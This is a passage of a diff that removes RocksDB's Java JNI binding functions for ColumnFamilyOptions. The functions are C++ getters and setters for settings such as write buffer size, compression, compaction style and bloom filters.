-      compaction_filter = reinterpret_cast<rocksdb::CompactionFilter*>
-        (jcompactionfilter_handle);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setWriteBufferSize
- * Signature: (JJ)I
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwrite_buffer_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jwrite_buffer_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        write_buffer_size = jwrite_buffer_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    writeBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_writeBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      write_buffer_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxWriteBufferNumber
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_write_buffer_number) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      max_write_buffer_number = jmax_write_buffer_number;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxWriteBufferNumber
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_maxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      max_write_buffer_number;
-}
-
-/*
- * Method:    setMemTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMemTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      memtable_factory.reset(
-      reinterpret_cast<rocksdb::MemTableRepFactory*>(jfactory_handle));
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    memTableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_ColumnFamilyOptions_memTableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  rocksdb::MemTableRepFactory* tf = opt->memtable_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  // temporarly fix for the historical typo
-  if (strcmp(tf->Name(), "HashLinkListRepFactory") == 0) {
-    return env->NewStringUTF("HashLinkedListRepFactory");
-  }
-
-  return env->NewStringUTF(tf->Name());
-}
-
-/*
- * Method:    useFixedLengthPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_useFixedLengthPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Method:    useCappedPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_useCappedPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      prefix_extractor.reset(rocksdb::NewCappedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Method:    setTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      table_factory.reset(reinterpret_cast<rocksdb::TableFactory*>(
-      jfactory_handle));
-}
-
-/*
- * Method:    tableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_ColumnFamilyOptions_tableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  rocksdb::TableFactory* tf = opt->table_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  return env->NewStringUTF(tf->Name());
-}
-
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    minWriteBufferNumberToMerge
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_minWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->min_write_buffer_number_to_merge;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMinWriteBufferNumberToMerge
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMinWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmin_write_buffer_number_to_merge) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->min_write_buffer_number_to_merge =
-          static_cast<int>(jmin_write_buffer_number_to_merge);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxWriteBufferNumberToMaintain
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_maxWriteBufferNumberToMaintain(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_write_buffer_number_to_maintain;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxWriteBufferNumberToMaintain
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxWriteBufferNumberToMaintain(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmax_write_buffer_number_to_maintain) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_write_buffer_number_to_maintain =
-      static_cast<int>(jmax_write_buffer_number_to_maintain);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->compression = rocksdb::CompressionTypeJni::toCppCompressionType(
-      jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_compressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      cf_opts->compression);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompressionPerLevel
- * Signature: (J[B)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyteArray jcompressionLevels) {
-  auto* options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto uptr_compression_levels =
-      rocksdb_compression_vector_helper(env, jcompressionLevels);
-  if(!uptr_compression_levels) {
-      // exception occurred
-      return;
-  }
-  options->compression_per_level = *(uptr_compression_levels.get());
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compressionPerLevel
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_ColumnFamilyOptions_compressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb_compression_list_helper(env,
-      cf_options->compression_per_level);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setBottommostCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setBottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_options->bottommost_compression =
-      rocksdb::CompressionTypeJni::toCppCompressionType(
-          jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    bottommostCompressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_bottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      cf_options->bottommost_compression);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompressionOptions
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompressionOptions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompression_options_handle) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto* compression_options =
-    reinterpret_cast<rocksdb::CompressionOptions*>(jcompression_options_handle);
-  cf_options->compression_opts = *compression_options;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionStyle
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte compaction_style) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->compaction_style =
-      static_cast<rocksdb::CompactionStyle>(compaction_style);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compactionStyle
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_compactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>
-      (jhandle)->compaction_style;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxTableFilesSizeFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_table_files_size) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->compaction_options_fifo.max_table_files_size =
-    static_cast<uint64_t>(jmax_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxTableFilesSizeFIFO
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->compaction_options_fifo.max_table_files_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    numLevels
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_numLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->num_levels;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setNumLevels
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setNumLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jnum_levels) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->num_levels =
-      static_cast<int>(jnum_levels);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelZeroFileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_levelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelZeroFileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelZeroSlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_levelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelSlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelZeroStopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_levelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelStopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      level0_stop_writes_trigger = static_cast<int>(
-      jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    targetFileSizeBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_targetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      target_file_size_base;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setTargetFileSizeBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setTargetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jtarget_file_size_base) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      target_file_size_base = static_cast<uint64_t>(jtarget_file_size_base);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    targetFileSizeMultiplier
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_targetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->target_file_size_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setTargetFileSizeMultiplier
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setTargetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jtarget_file_size_multiplier) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->target_file_size_multiplier =
-          static_cast<int>(jtarget_file_size_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxBytesForLevelBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_base;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxBytesForLevelBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_bytes_for_level_base) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_base =
-          static_cast<int64_t>(jmax_bytes_for_level_base);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelCompactionDynamicLevelBytes
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_levelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level_compaction_dynamic_level_bytes;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelCompactionDynamicLevelBytes
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_dynamic_level_bytes) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level_compaction_dynamic_level_bytes =
-          (jenable_dynamic_level_bytes);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxBytesForLevelMultiplier
- * Signature: (J)D
- */
-jdouble Java_org_rocksdb_ColumnFamilyOptions_maxBytesForLevelMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxBytesForLevelMultiplier
- * Signature: (JD)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxBytesForLevelMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmax_bytes_for_level_multiplier) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_bytes_for_level_multiplier =
-      static_cast<double>(jmax_bytes_for_level_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxCompactionBytes
- * Signature: (J)I
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxCompactionBytes(JNIEnv* env,
-                                                              jobject jobj,
-                                                              jlong jhandle) {
-  return static_cast<jlong>(
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-          ->max_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxCompactionBytes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxCompactionBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_compaction_bytes) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_compaction_bytes = static_cast<uint64_t>(jmax_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    arenaBlockSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_arenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      arena_block_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setArenaBlockSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setArenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jarena_block_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jarena_block_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        arena_block_size = jarena_block_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    disableAutoCompactions
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_disableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->disable_auto_compactions;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setDisableAutoCompactions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setDisableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jdisable_auto_compactions) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->disable_auto_compactions =
-          static_cast<bool>(jdisable_auto_compactions);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxSequentialSkipInIterations
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_sequential_skip_in_iterations;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxSequentialSkipInIterations
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_sequential_skip_in_iterations) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_sequential_skip_in_iterations =
-          static_cast<int64_t>(jmax_sequential_skip_in_iterations);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    inplaceUpdateSupport
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_inplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->inplace_update_support;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setInplaceUpdateSupport
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setInplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jinplace_update_support) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->inplace_update_support =
-          static_cast<bool>(jinplace_update_support);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    inplaceUpdateNumLocks
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_inplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->inplace_update_num_locks;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setInplaceUpdateNumLocks
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setInplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jinplace_update_num_locks) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jinplace_update_num_locks);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        inplace_update_num_locks = jinplace_update_num_locks;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    memtablePrefixBloomSizeRatio
- * Signature: (J)I
- */
-jdouble Java_org_rocksdb_ColumnFamilyOptions_memtablePrefixBloomSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMemtablePrefixBloomSizeRatio
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMemtablePrefixBloomSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmemtable_prefix_bloom_size_ratio) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio =
-      static_cast<double>(jmemtable_prefix_bloom_size_ratio);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    bloomLocality
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_bloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      bloom_locality;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setBloomLocality
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setBloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jbloom_locality) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->bloom_locality =
-      static_cast<int32_t>(jbloom_locality);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxSuccessiveMerges
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      max_successive_merges;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxSuccessiveMerges
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_successive_merges) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmax_successive_merges);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        max_successive_merges = jmax_successive_merges;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeFiltersForHits
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_optimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->optimize_filters_for_hits;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setOptimizeFiltersForHits
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setOptimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean joptimize_filters_for_hits) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->optimize_filters_for_hits =
-          static_cast<bool>(joptimize_filters_for_hits);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    memtableHugePageSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_memtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->memtable_huge_page_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMemtableHugePageSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMemtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmemtable_huge_page_size) {
-
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmemtable_huge_page_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-        jhandle)->memtable_huge_page_size =
-            jmemtable_huge_page_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    softPendingCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_softPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->soft_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setSoftPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setSoftPendingCompactionBytesLimit(
